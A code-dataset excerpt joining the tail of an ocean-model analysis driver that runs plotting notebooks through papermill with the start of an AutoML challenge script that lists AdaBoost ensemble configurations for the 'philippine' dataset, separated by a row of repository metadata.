f"{templates_nb_path}/template_dmoc_srfcbflx.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True,
)
#_______________________________________________________________________
webpage[f"image_{image_count}"] = {}
webpage[f"image_{image_count}"]["name"] = f"{'srf. buoyancy transf.'} at sigma2={which_isopyc} kg/m^3"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"]["short_name"] = short_name
image_count += 1
return webpage
#
#
#_______________________________________________________________________________
def drive_vprofile(yaml_settings, analysis_name):
# copy yaml settings for analysis driver --> hslice:
#
driver_settings = yaml_settings[analysis_name].copy()
# create current primary parameter from yaml settings
current_params = {}
for key, value in yaml_settings.items():
# if value is a dictionary its not a primary paramter anymore e.g.
# hslice: --> dict(...)
# temp:
# levels: [-2, 30, 41]
# depths: [0, 100, 400, 1000]
# ....
if isinstance(value, dict):
pass
else:
current_params[key] = value
# initialse webpage for analyis
webpage = {}
image_count = 0
# loop over variable name
for vname in driver_settings:
print(f' --> compute: {vname}')
current_params2 = {}
current_params2 = current_params.copy()
current_params2["vname"] = vname
current_params2.update(driver_settings[vname])
#_______________________________________________________________________
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}.ipynb"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#_______________________________________________________________________
pm.execute_notebook(
f"{templates_nb_path}/template_vprofile.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True)
#_______________________________________________________________________
webpage[f"image_{image_count}"] = {}
webpage[f"image_{image_count}"]["name"] = f"{vname.upper()}"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"]["short_name"] = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}"
image_count += 1
return webpage
#
#
#_______________________________________________________________________________
def drive_vprofile_clim(yaml_settings, analysis_name):
# copy yaml settings for analysis driver --> hslice:
#
driver_settings = yaml_settings[analysis_name].copy()
# create current primary parameter from yaml settings
current_params = {}
for key, value in yaml_settings.items():
# if value is a dictionary its not a primary paramter anymore e.g.
# hslice: --> dict(...)
# temp:
# levels: [-2, 30, 41]
# depths: [0, 100, 400, 1000]
# ....
if isinstance(value, dict):
pass
else:
current_params[key] = value
# initialse webpage for analyis
webpage = {}
image_count = 0
# loop over variable name
for vname in driver_settings:
print(f' --> compute: {vname}')
current_params2 = {}
current_params2 = current_params.copy()
current_params2["vname"] = vname
current_params2.update(driver_settings[vname])
#_______________________________________________________________________
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}.ipynb"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#_______________________________________________________________________
pm.execute_notebook(
f"{templates_nb_path}/template_vprofile_clim.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True)
#_______________________________________________________________________
webpage[f"image_{image_count}"] = {}
webpage[f"image_{image_count}"]["name"] = f"{vname.capitalize()}"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"]["short_name"] = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}"
image_count += 1
return webpage
#
#
#_______________________________________________________________________________
def drive_transect(yaml_settings, analysis_name):
# copy yaml settings for analysis driver --> hslice:
#
driver_settings = yaml_settings[analysis_name].copy()
# create current primary parameter from yaml settings
current_params = {}
for key, value in yaml_settings.items():
# if value is a dictionary its not a primary paramter anymore e.g.
# hslice: --> dict(...)
# temp:
# levels: [-2, 30, 41]
# depths: [0, 100, 400, 1000]
# ....
if isinstance(value, dict):
pass
else:
current_params[key] = value
# initialse webpage for analyis
webpage = {}
image_count = 0
# loop over variable name
for vname in driver_settings:
print(f' --> compute: {vname}')
auxvname = vname.replace('/',':')
for tname in driver_settings[vname]:
current_params2 = {}
current_params2 = current_params.copy()
current_params2["vname"] = vname
current_params2.update(driver_settings[vname][tname])
#___________________________________________________________________
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{tname}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{tname}.ipynb"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#___________________________________________________________________
pm.execute_notebook(
f"{templates_nb_path}/template_transect.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True)
#___________________________________________________________________
webpage[f"image_{image_count}"] = {}
webpage[f"image_{image_count}"]["name"] = f"{auxvname.upper()} @ {tname}"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"]["short_name"] = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{tname}"
image_count += 1
return webpage
#
#
#_______________________________________________________________________________
def drive_transect_clim(yaml_settings, analysis_name):
# copy yaml settings for analysis driver --> hslice:
#
driver_settings = yaml_settings[analysis_name].copy()
# create current primary parameter from yaml settings
current_params = {}
for key, value in yaml_settings.items():
# if value is a dictionary its not a primary paramter anymore e.g.
# hslice: --> dict(...)
# temp:
# levels: [-2, 30, 41]
# depths: [0, 100, 400, 1000]
# ....
if isinstance(value, dict):
pass
else:
current_params[key] = value
# initialse webpage for analyis
webpage = {}
image_count = 0
# loop over variable name
for vname in driver_settings:
print(f' --> compute: {vname}')
for tname in driver_settings[vname]:
current_params2 = {}
current_params2 = current_params.copy()
current_params2["vname"] = vname
current_params2.update(driver_settings[vname][tname])
#___________________________________________________________________
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}_{tname}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}_{tname}.ipynb"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#___________________________________________________________________
pm.execute_notebook(
f"{templates_nb_path}/template_transect_clim.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True)
#___________________________________________________________________
webpage[f"image_{image_count}"] = {}
webpage[f"image_{image_count}"]["name"] = f"{vname.capitalize()} @ {tname} m"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"]["short_name"] = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}_{tname}"
image_count += 1
return webpage
#
#
#_______________________________________________________________________________
def drive_transect_vflx_t(yaml_settings, analysis_name):
# copy yaml settings for analysis driver --> hslice:
#
driver_settings = yaml_settings[analysis_name].copy()
# create current primary parameter from yaml settings
current_params = {}
for key, value in yaml_settings.items():
# if value is a dictionary its not a primary paramter anymore e.g.
# hslice: --> dict(...)
# temp:
# levels: [-2, 30, 41]
# depths: [0, 100, 400, 1000]
# ....
if isinstance(value, dict):
pass
else:
current_params[key] = value
# initialse webpage for analyis
webpage = {}
image_count = 0
# loop over variable name
for tname in driver_settings:
print(f' --> compute: {tname}')
current_params2 = {}
current_params2 = current_params.copy()
current_params2.update(driver_settings[tname])
#_______________________________________________________________________
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{tname}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{tname}.ipynb"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#_______________________________________________________________________
pm.execute_notebook(
f"{templates_nb_path}/template_transect_vflx_t.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True)
#_______________________________________________________________________
webpage[f"image_{image_count}"] = {}
webpage[f"image_{image_count}"]["name"] = f" @ {tname}"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"]["short_name"] = f"{yaml_settings['workflow_name']}_{analysis_name}_{tname}"
image_count += 1
return webpage
#
#
#_______________________________________________________________________________
def drive_zmeantrans(yaml_settings, analysis_name):
# copy yaml settings for analysis driver --> hslice:
#
driver_settings = yaml_settings[analysis_name].copy()
# create current primary parameter from yaml settings
current_params = {}
for key, value in yaml_settings.items():
# if value is a dictionary its not a primary paramter anymore e.g.
# hslice: --> dict(...)
# temp:
# levels: [-2, 30, 41]
# depths: [0, 100, 400, 1000]
# ....
if isinstance(value, dict):
pass
else:
current_params[key] = value
# initialse webpage for analyis
webpage = {}
image_count = 0
# loop over variable name
for vname in driver_settings:
print(f' --> compute: {vname}')
auxvname = vname.replace('/',':')
# loop over depths
for box_region in driver_settings[vname]["box_regions"]:
print(f' --> compute: {box_region}')
current_params2 = {}
current_params2 = current_params.copy()
current_params2["vname"] = vname
current_params2["box_region"] = list([box_region])
current_params2.update(driver_settings[vname])
del current_params2["box_regions"] # --> delete depth list [0, 100, 1000,...] from current_param dict()
str_boxregion = box_region.split('/')[-1].split('.')[0]
#___________________________________________________________________
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{str_boxregion}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{str_boxregion}.ipynb"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#___________________________________________________________________
pm.execute_notebook(
f"{templates_nb_path}/template_zmeantransect.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True,
)
#___________________________________________________________________
webpage[f"image_{image_count}"] = {}
webpage[f"image_{image_count}"][
"name"
] = f"{auxvname.capitalize()} at {str_boxregion} m"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"][
"short_name"
] = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{str_boxregion}"
image_count += 1
return webpage
#
#
#_______________________________________________________________________________
def drive_zmeantrans_clim(yaml_settings, analysis_name):
# copy yaml settings for analysis driver --> hslice:
#
driver_settings = yaml_settings[analysis_name].copy()
# create current primary parameter from yaml settings
current_params = {}
for key, value in yaml_settings.items():
# if value is a dictionary its not a primary paramter anymore e.g.
# hslice: --> dict(...)
# temp:
# levels: [-2, 30, 41]
# depths: [0, 100, 400, 1000]
# ....
if isinstance(value, dict):
pass
else:
current_params[key] = value
# initialse webpage for analyis
webpage = {}
image_count = 0
# loop over variable name
for vname in driver_settings:
print(f' --> compute: {vname}')
# loop over depths
for box_region in driver_settings[vname]["box_regions"]:
print(f' --> compute: {box_region}')
current_params2 = {}
current_params2 = current_params.copy()
current_params2["vname"] = vname
current_params2["box_region"] = list([box_region])
current_params2.update(driver_settings[vname])
del current_params2["box_regions"] # --> delete depth list [0, 100, 1000,...] from current_param dict()
str_boxregion = box_region.split('/')[-1].split('.')[0]
#___________________________________________________________________
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}_{str_boxregion}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}_{str_boxregion}.ipynb"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#___________________________________________________________________
pm.execute_notebook(
f"{templates_nb_path}/template_zmeantransect_clim.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True,
)
#___________________________________________________________________
webpage[f"image_{image_count}"] = {}
webpage[f"image_{image_count}"][
"name"
] = f"{vname.capitalize()} at {str_boxregion} m"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"][
"short_name"
] = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}_{str_boxregion}"
image_count += 1
return webpage
#
#
#_______________________________________________________________________________
def drive_ghflx(yaml_settings, analysis_name):
# copy yaml settings for analysis driver --> hslice:
#
driver_settings = yaml_settings[analysis_name].copy()
# create current primary parameter from yaml settings
current_params = {}
for key, value in yaml_settings.items():
# if value is a dictionary its not a primary paramter anymore e.g.
# hslice: --> dict(...)
# temp:
# levels: [-2, 30, 41]
# depths: [0, 100, 400, 1000]
# ....
if isinstance(value, dict):
pass
else:
current_params[key] = value
# initialse webpage for analyis
webpage = {}
image_count = 0
print(f' --> compute ghflx:')
current_params2 = {}
current_params2 = current_params.copy()
#___________________________________________________________________________
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}.ipynb"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#___________________________________________________________________________
pm.execute_notebook(
f"{templates_nb_path}/template_ghflx.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True)
#___________________________________________________________________________
webpage[f"image_{image_count}"] = {}
webpage[f"image_{image_count}"]["name"] = f" GHFLX"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"]["short_name"] = f"{yaml_settings['workflow_name']}_{analysis_name}"
image_count += 1
return webpage
#
#
#_______________________________________________________________________________
def drive_mhflx(yaml_settings, analysis_name):
# copy yaml settings for analysis driver --> hslice:
#
driver_settings = yaml_settings[analysis_name].copy()
# create current primary parameter from yaml settings
current_params = {}
for key, value in yaml_settings.items():
# if value is a dictionary its not a primary paramter anymore e.g.
# hslice: --> dict(...)
# temp:
# levels: [-2, 30, 41]
# depths: [0, 100, 400, 1000]
# ....
if isinstance(value, dict):
pass
else:
current_params[key] = value
# initialse webpage for analyis
webpage = {}
image_count = 0
print(f' --> compute mhflx:')
current_params2 = {}
current_params2 = current_params.copy()
#___________________________________________________________________________
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}.ipynb"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#___________________________________________________________________________
pm.execute_notebook(
f"{templates_nb_path}/template_mhflx.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True)
#___________________________________________________________________________
webpage[f"image_{image_count}"] = {}
webpage[f"image_{image_count}"]["name"] = f" MHFLX"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"]["short_name"] = f"{yaml_settings['workflow_name']}_{analysis_name}"
image_count += 1
return webpage
| 45.471108
| 151
| 0.616923
| 5,562
| 56,657
| 4.882057
| 0.032362
| 0.092804
| 0.048833
| 0.067614
| 0.965051
| 0.958754
| 0.953267
| 0.948332
| 0.937762
| 0.932275
| 0
| 0.01426
| 0.270982
| 56,657
| 1,245
| 152
| 45.507631
| 0.643013
| 0.245195
| 0
| 0.818554
| 0
| 0.016371
| 0.283393
| 0.153852
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025921
| false
| 0.025921
| 0.016371
| 0
| 0.068213
| 0.032742
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6d318058a855326ca00936405aa9eb324001cc77
| 19,800
|
py
|
Python
|
001_philippine.py
|
bigdatamatta/ChaLearn_Automatic_Machine_Learning_Challenge_2015
|
a9acb6906ff141e7c24cff80f92efef7d7c3ff09
|
[
"BSD-2-Clause"
] | 1
|
2019-06-12T19:55:35.000Z
|
2019-06-12T19:55:35.000Z
|
001_philippine.py
|
bigdatamatta/ChaLearn_Automatic_Machine_Learning_Challenge_2015
|
a9acb6906ff141e7c24cff80f92efef7d7c3ff09
|
[
"BSD-2-Clause"
] | null | null | null |
001_philippine.py
|
bigdatamatta/ChaLearn_Automatic_Machine_Learning_Challenge_2015
|
a9acb6906ff141e7c24cff80f92efef7d7c3ff09
|
[
"BSD-2-Clause"
] | null | null | null |
import argparse
import os
import numpy as np
import autosklearn
import autosklearn.data
import autosklearn.data.data_manager
import autosklearn.models.evaluator
from ParamSklearn.classification import ParamSklearnClassifier
parser = argparse.ArgumentParser()
parser.add_argument('input')
parser.add_argument('output')
args = parser.parse_args()
input = args.input
dataset = 'philippine'
output = args.output
D = autosklearn.data.data_manager.DataManager(dataset, input)
X = D.data['X_train']
y = D.data['Y_train']
X_valid = D.data['X_valid']
X_test = D.data['X_test']
# Subset of features found with RFE. Feature with least importance in sklearn
# RF removed. Afterwards, trained RF on remaining features with 5CV. In the
# end, choose feature set with lowest error
features = [33, 89, 140, 168, 178, 271]
X = X[:, features]
X_valid = X_valid[:, features]
X_test = X_test[:, features]
# Weights of the ensemble members as determined by Ensemble Selection
weights = np.array([0.100000, 0.080000, 0.080000, 0.060000, 0.040000,
0.040000, 0.040000, 0.040000, 0.040000, 0.040000,
0.040000, 0.020000, 0.020000, 0.020000, 0.020000,
0.020000, 0.020000, 0.020000, 0.020000, 0.020000,
0.020000, 0.020000, 0.020000, 0.020000, 0.020000,
0.020000, 0.020000, 0.020000, 0.020000, 0.020000,
0.020000])
# Ensemble members found by SMAC
configurations = [
{'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.243038132773',
'adaboost:max_depth': '9.0',
'adaboost:n_estimators': '475.0',
'balancing:strategy': 'none',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'cosine',
'feature_agglomeration:linkage': 'complete',
'feature_agglomeration:n_clusters': '287.0',
'imputation:strategy': 'most_frequent',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'none',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.246430392425',
'adaboost:max_depth': '9.0',
'adaboost:n_estimators': '436.0',
'balancing:strategy': 'weighting',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'manhattan',
'feature_agglomeration:linkage': 'average',
'feature_agglomeration:n_clusters': '156.0',
'imputation:strategy': 'median',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'standard',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.205679811363',
'adaboost:max_depth': '9.0',
'adaboost:n_estimators': '485.0',
'balancing:strategy': 'none',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'euclidean',
'feature_agglomeration:linkage': 'complete',
'feature_agglomeration:n_clusters': '79.0',
'imputation:strategy': 'most_frequent',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.250841964136',
'adaboost:max_depth': '10.0',
'adaboost:n_estimators': '479.0',
'balancing:strategy': 'none',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'euclidean',
'feature_agglomeration:linkage': 'average',
'feature_agglomeration:n_clusters': '352.0',
'imputation:strategy': 'median',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'none',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.329040651125',
'adaboost:max_depth': '10.0',
'adaboost:n_estimators': '493.0',
'balancing:strategy': 'weighting',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'manhattan',
'feature_agglomeration:linkage': 'average',
'feature_agglomeration:n_clusters': '268.0',
'imputation:strategy': 'most_frequent',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.376704790019',
'adaboost:max_depth': '10.0',
'adaboost:n_estimators': '400.0',
'balancing:strategy': 'weighting',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'euclidean',
'feature_agglomeration:linkage': 'ward',
'feature_agglomeration:n_clusters': '344.0',
'imputation:strategy': 'median',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.483824181899',
'adaboost:max_depth': '9.0',
'adaboost:n_estimators': '479.0',
'balancing:strategy': 'weighting',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'cosine',
'feature_agglomeration:linkage': 'average',
'feature_agglomeration:n_clusters': '310.0',
'imputation:strategy': 'most_frequent',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.246430392425',
'adaboost:max_depth': '9.0',
'adaboost:n_estimators': '494.0',
'balancing:strategy': 'weighting',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'cosine',
'feature_agglomeration:linkage': 'average',
'feature_agglomeration:n_clusters': '156.0',
'imputation:strategy': 'median',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.319596208353',
'adaboost:max_depth': '10.0',
'adaboost:n_estimators': '446.0',
'balancing:strategy': 'weighting',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'euclidean',
'feature_agglomeration:linkage': 'complete',
'feature_agglomeration:n_clusters': '65.0',
'imputation:strategy': 'mean',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.208071429428',
'adaboost:max_depth': '9.0',
'adaboost:n_estimators': '487.0',
'balancing:strategy': 'weighting',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'cosine',
'feature_agglomeration:linkage': 'complete',
'feature_agglomeration:n_clusters': '219.0',
'imputation:strategy': 'most_frequent',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'none',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.362379903949',
'adaboost:max_depth': '10.0',
'adaboost:n_estimators': '389.0',
'balancing:strategy': 'none',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'cosine',
'feature_agglomeration:linkage': 'complete',
'feature_agglomeration:n_clusters': '123.0',
'imputation:strategy': 'most_frequent',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.468508930474',
'adaboost:max_depth': '10.0',
'adaboost:n_estimators': '477.0',
'balancing:strategy': 'weighting',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'euclidean',
'feature_agglomeration:linkage': 'average',
'feature_agglomeration:n_clusters': '244.0',
'imputation:strategy': 'median',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.284273806405',
'adaboost:max_depth': '9.0',
'adaboost:n_estimators': '483.0',
'balancing:strategy': 'none',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'cosine',
'feature_agglomeration:linkage': 'complete',
'feature_agglomeration:n_clusters': '174.0',
'imputation:strategy': 'median',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.2635286978',
'adaboost:max_depth': '10.0',
'adaboost:n_estimators': '482.0',
'balancing:strategy': 'none',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'manhattan',
'feature_agglomeration:linkage': 'average',
'feature_agglomeration:n_clusters': '118.0',
'imputation:strategy': 'most_frequent',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.326966274076',
'adaboost:max_depth': '10.0',
'adaboost:n_estimators': '494.0',
'balancing:strategy': 'none',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'euclidean',
'feature_agglomeration:linkage': 'average',
'feature_agglomeration:n_clusters': '87.0',
'imputation:strategy': 'most_frequent',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.239427049389',
'adaboost:max_depth': '9.0',
'adaboost:n_estimators': '393.0',
'balancing:strategy': 'none',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'euclidean',
'feature_agglomeration:linkage': 'complete',
'feature_agglomeration:n_clusters': '331.0',
'imputation:strategy': 'most_frequent',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.272345990341',
'adaboost:max_depth': '10.0',
'adaboost:n_estimators': '478.0',
'balancing:strategy': 'none',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'manhattan',
'feature_agglomeration:linkage': 'average',
'feature_agglomeration:n_clusters': '20.0',
'imputation:strategy': 'most_frequent',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'standard',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.36300772469',
'adaboost:max_depth': '10.0',
'adaboost:n_estimators': '430.0',
'balancing:strategy': 'weighting',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'euclidean',
'feature_agglomeration:linkage': 'complete',
'feature_agglomeration:n_clusters': '88.0',
'imputation:strategy': 'median',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.29318612753',
'adaboost:max_depth': '10.0',
'adaboost:n_estimators': '418.0',
'balancing:strategy': 'weighting',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'cosine',
'feature_agglomeration:linkage': 'complete',
'feature_agglomeration:n_clusters': '220.0',
'imputation:strategy': 'median',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'standard',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.315769388471',
'adaboost:max_depth': '10.0',
'adaboost:n_estimators': '494.0',
'balancing:strategy': 'none',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'euclidean',
'feature_agglomeration:linkage': 'average',
'feature_agglomeration:n_clusters': '270.0',
'imputation:strategy': 'median',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.295544282435',
'adaboost:max_depth': '9.0',
'adaboost:n_estimators': '478.0',
'balancing:strategy': 'none',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'euclidean',
'feature_agglomeration:linkage': 'average',
'feature_agglomeration:n_clusters': '195.0',
'imputation:strategy': 'most_frequent',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.298219714131',
'adaboost:max_depth': '9.0',
'adaboost:n_estimators': '473.0',
'balancing:strategy': 'none',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'euclidean',
'feature_agglomeration:linkage': 'average',
'feature_agglomeration:n_clusters': '39.0',
'imputation:strategy': 'mean',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'standard',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.370877623224',
'adaboost:max_depth': '10.0',
'adaboost:n_estimators': '382.0',
'balancing:strategy': 'none',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'euclidean',
'feature_agglomeration:linkage': 'average',
'feature_agglomeration:n_clusters': '331.0',
'imputation:strategy': 'most_frequent',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.339058617161',
'adaboost:max_depth': '10.0',
'adaboost:n_estimators': '466.0',
'balancing:strategy': 'none',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'manhattan',
'feature_agglomeration:linkage': 'complete',
'feature_agglomeration:n_clusters': '38.0',
'imputation:strategy': 'most_frequent',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'standard',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.272345990341',
'adaboost:max_depth': '10.0',
'adaboost:n_estimators': '478.0',
'balancing:strategy': 'weighting',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'cosine',
'feature_agglomeration:linkage': 'average',
'feature_agglomeration:n_clusters': '68.0',
'imputation:strategy': 'most_frequent',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'none',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.268568387674',
'adaboost:max_depth': '10.0',
'adaboost:n_estimators': '499.0',
'balancing:strategy': 'none',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'manhattan',
'feature_agglomeration:linkage': 'average',
'feature_agglomeration:n_clusters': '78.0',
'imputation:strategy': 'most_frequent',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'standard',
},
{
'adaboost:algorithm': 'SAMME.R',
